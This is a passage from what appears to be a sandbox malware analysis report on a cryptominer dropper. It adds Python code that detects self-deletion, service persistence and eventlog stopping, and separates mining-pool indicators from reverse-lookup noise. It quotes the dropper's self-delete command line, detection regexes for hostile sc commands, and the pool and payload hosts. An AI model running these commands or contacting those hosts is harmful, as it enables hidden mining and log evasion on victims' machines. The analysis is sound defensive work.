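4536|4500|C:\Windows\system32\cmd.exe|C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\putty.exe"
1144|4536|C:\Windows\system32\choice.exe|choice /C Y /N /D Y /T 3
4600|700|C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe|C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
4601|4600|C:\Windows\explorer.exe|explorer.exe
"""

# "choice ... /T n & del <path>": group 1 is the delay, group 2 the deleted path.
SELF_DELETE = re.compile(r'\bchoice\b.*?/T\s+(\d+).*?&\s*del\s+"?([^"&]+?)"?\s*$', re.I)
# "sc create <name> ... binpath= <path>": quoted or bare path.
SC_CREATE = re.compile(r'\bcreate\s+"?([^"\s]+)"?.*?\bbinpath=\s*(?:"([^"]*)"|(\S+))', re.I)
SC_START = re.compile(r'\bstart\s+"?([^"\s]+)"?', re.I)
SC_STOP_EVENTLOG = re.compile(r"\bstop\s+eventlog\b", re.I)
# A service binary under a user-writable root rather than Program Files or
# System32 is the persistence tell in both runs.
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\")


def load_events(text):
    """Parse pid|ppid|image|cmdline lines into event dicts, creation order kept."""
    events = []
    for line in text.strip().splitlines():
        pid, ppid, image, cmdline = line.split("|", 3)
        events.append({"pid": int(pid), "ppid": int(ppid), "image": image, "cmdline": cmdline})
    return events


def _is(image, name):
    return image.lower().endswith("\\" + name)


def find_self_delete(events):
    """cmd.exe that sleeps via 'choice /T n' and then deletes its parent's own image."""
    by_pid = {e["pid"]: e for e in events}
    found = []
    for e in events:
        if not _is(e["image"], "cmd.exe"):
            continue
        m = SELF_DELETE.search(e["cmdline"])
        parent = by_pid.get(e["ppid"])
        if m and parent and m.group(2).strip().lower() == parent["image"].lower():
            found.append({"dropper_pid": parent["pid"], "dropper": parent["image"],
                          "delay_s": int(m.group(1))})
    return found


def service_chains(events):
    """For each 'sc create', follow the chain: was eventlog stopped before the
    service was started, and which later process ran from the binpath."""
    chains = []
    for i, e in enumerate(events):
        m = SC_CREATE.search(e["cmdline"]) if _is(e["image"], "sc.exe") else None
        if not m:
            continue
        name = m.group(1)
        binpath = m.group(2) or m.group(3)
        chain = {"service": name, "binpath": binpath,
                 "suspicious_location": binpath.lower().startswith(USER_WRITABLE),
                 "eventlog_stopped_before_start": False, "payload_pid": None}
        started = False
        for x in events[i + 1:]:
            if _is(x["image"], "sc.exe"):
                if not started and SC_STOP_EVENTLOG.search(x["cmdline"]):
                    chain["eventlog_stopped_before_start"] = True
                s = SC_START.search(x["cmdline"])
                if s and s.group(1).lower() == name.lower():
                    started = True
            elif x["image"].lower() == binpath.lower() and chain["payload_pid"] is None:
                chain["payload_pid"] = x["pid"]
        chains.append(chain)
    return chains


if __name__ == "__main__":
    evs = load_events(CONSTRUCTED_EVENTS)
    print(find_self_delete(evs))
    print(service_chains(evs))
```

Because the dropper deletes itself three seconds after starting the service, the file hashes worth keeping are those of the service binary in the Files section (the report records two different uxtldsktkgfv.exe hashes per run, so the binary is rewritten after it first lands), and the eventlog stop means the Security and System logs on the victim will be silent from that point; collect Sysmon or EDR telemetry rather than relying on the Event Log for anything after the sc create.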

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 de-zephyr.miningocean.org udp
DE 162.19.241.67:5342 de-zephyr.miningocean.org tcp
US 8.8.8.8:53 67.241.19.162.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
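Most rows in the four Network tables are PTR lookups (*.in-addr.arpa) sent to 8.8.8.8. Those are reverse lookups the analysis VM performs for addresses it sees, not traffic the sample initiated; the same PTR names recur across runs regardless of which pool the sample used, which is what the VM's own background traffic looks like, and they should not be copied into a blocklist. What is actionable is the mining pool hostnames and endpoints, randomxmonero.auto.nicehash.com at 34.149.22.228:443 and de-zephyr.miningocean.org at 162.19.241.67:5342, and the raw-IP HTTP host 46.102.174.48:80 that behavioral1 fetched miner.exe from and that behavioral2 also contacts. The following added example, not part of the sandbox report, parses rows in the report's column order (country, destination, domain or "-" when none, protocol) and keeps a PTR only when it reverses to an address the sample actually opened a TCP connection to; the rows are constructed by copying the behavioral2 and behavioral3 tables, and the remaining PTR rows in the other tables classify the same way.

```python
"""Added example (not from the sandbox report): separating actionable
network indicators from resolver noise in the report's Network tables.
Rows below are constructed by copying the behavioral2 and behavioral3
tables (country, destination, domain or '-', protocol); the rules for
what counts as noise are this example's, not the sandbox's."""

CONSTRUCTED_ROWS = """
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 randomxmonero.auto.nicehash.com udp
US 34.149.22.228:443 randomxmonero.auto.nicehash.com tcp
ZA 46.102.174.48:80 - tcp
US 8.8.8.8:53 228.22.149.34.in-addr.arpa udp
US 8.8.8.8:53 de-zephyr.miningocean.org udp
DE 162.19.241.67:5342 de-zephyr.miningocean.org tcp
US 8.8.8.8:53 67.241.19.162.in-addr.arpa udp
"""

PTR_SUFFIX = ".in-addr.arpa"


def parse_rows(text):
    """One dict per table row; '-' in the domain column becomes None."""
    rows = []
    for line in text.strip().splitlines():
        country, dest, domain, proto = line.split()
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": None if domain == "-" else domain.lower(), "proto": proto})
    return rows


def ptr_to_ip(name):
    """'67.241.19.162.in-addr.arpa' -> '162.19.241.67' (labels are reversed)."""
    labels = name.lower()[: -len(PTR_SUFFIX)].split(".")
    return ".".join(reversed(labels))


def triage(rows):
    """Split rows into indicators and noise.

    domains:              names the sample resolved or connected to
    endpoints:            every TCP ip:port the sample connected to
    direct_ip_endpoints:  TCP endpoints with no name at all (no DNS to alert on)
    ptr_corroborated_ips: PTRs that reverse to an address in endpoints
    ptr_noise:            every other PTR, i.e. the VM's own reverse lookups
    """
    tcp_ips = {r["ip"] for r in rows if r["proto"] == "tcp"}
    domains, endpoints, direct_ip, corroborated, noise = set(), set(), set(), set(), []
    for r in rows:
        d = r["domain"]
        if r["proto"] == "udp" and r["port"] == 53 and d:
            if d.endswith(PTR_SUFFIX):
                ip = ptr_to_ip(d)
                if ip in tcp_ips:
                    corroborated.add(ip)
                else:
                    noise.append(d)
            else:
                domains.add(d)
        elif r["proto"] == "tcp":
            ep = f'{r["ip"]}:{r["port"]}'
            endpoints.add(ep)
            if d:
                domains.add(d)
            else:
                direct_ip.add(ep)
    return {"domains": sorted(domains), "endpoints": sorted(endpoints),
            "direct_ip_endpoints": sorted(direct_ip),
            "ptr_corroborated_ips": sorted(corroborated), "ptr_noise": noise}


if __name__ == "__main__":
    for key, value in triage(parse_rows(CONSTRUCTED_ROWS)).items():
        print(f"{key}: {value}")
```

Port-based mining detection would catch 5342 on miningocean but not the NiceHash endpoint on 443, so there the hostname and the resolved address are the durable indicators; the direct-IP fetch from 46.102.174.48 generates no DNS at all and is only visible in proxy, firewall or NetFlow data.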

Files

memory/2012-1-0x00007FFDCC4D0000-0x00007FFDCC4D2000-memory.dmp

memory/2012-4-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp

memory/2012-3-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp

memory/2012-2-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp

memory/2012-0-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp

memory/2012-6-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp

C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe

MD5 c69337e51b250b87b474867376cdb707
SHA1 4642f2eb7dfe64b4f934d9829caf4833647c265c
SHA256 ac095c35dc6e044530c4b9024eb8a6ecea122be06dab5b17c1e5fc04b9d342f8
SHA512 e8c85717f2d47c69ad74eb884d2cb513c9c2c2842e148b406ce634e2b02dcc637122e31a330345310a88c7f8287b3c47b3cbcd7c6e03a73549563d37b220bb09

C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe

MD5 338cb476917c2fdaced336fd8ba5c4b8
SHA1 bcc7b4ec89555e7eb9aa1ed4724b00b8f490ac0b
SHA256 e4211f8b50df08971e33139ff338e3914e76d81331aaf2a022795d8c443e2d7d
SHA512 aa88e25df77917a0e22b1688a2814712ae5f8f7250b70032ca59a4ea4999ad111113c4ff310786e2a69d0ed6ca6884d8436b60d8eee62c2e080ee7411165e49c

memory/1380-10-0x00007FFDCC430000-0x00007FFDCC625000-memory.dmp

memory/1380-9-0x00007FF698460000-0x00007FF698F83000-memory.dmp

memory/2560-21-0x0000000140000000-0x000000014000D000-memory.dmp

memory/1376-24-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-29-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-36-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-32-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-35-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-34-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-33-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-31-0x0000000001130000-0x0000000001150000-memory.dmp

memory/1376-30-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-27-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1380-28-0x00007FFDCC430000-0x00007FFDCC625000-memory.dmp

memory/1380-26-0x00007FF698460000-0x00007FF698F83000-memory.dmp

memory/1376-25-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-22-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-23-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1380-13-0x00007FF698460000-0x00007FF698F83000-memory.dmp

memory/1380-12-0x00007FF698460000-0x00007FF698F83000-memory.dmp

memory/2560-18-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2560-17-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2560-16-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2560-15-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2560-14-0x0000000140000000-0x000000014000D000-memory.dmp

memory/1380-11-0x00007FF698460000-0x00007FF698F83000-memory.dmp

memory/1376-37-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-39-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-40-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-41-0x0000000140000000-0x0000000140848000-memory.dmp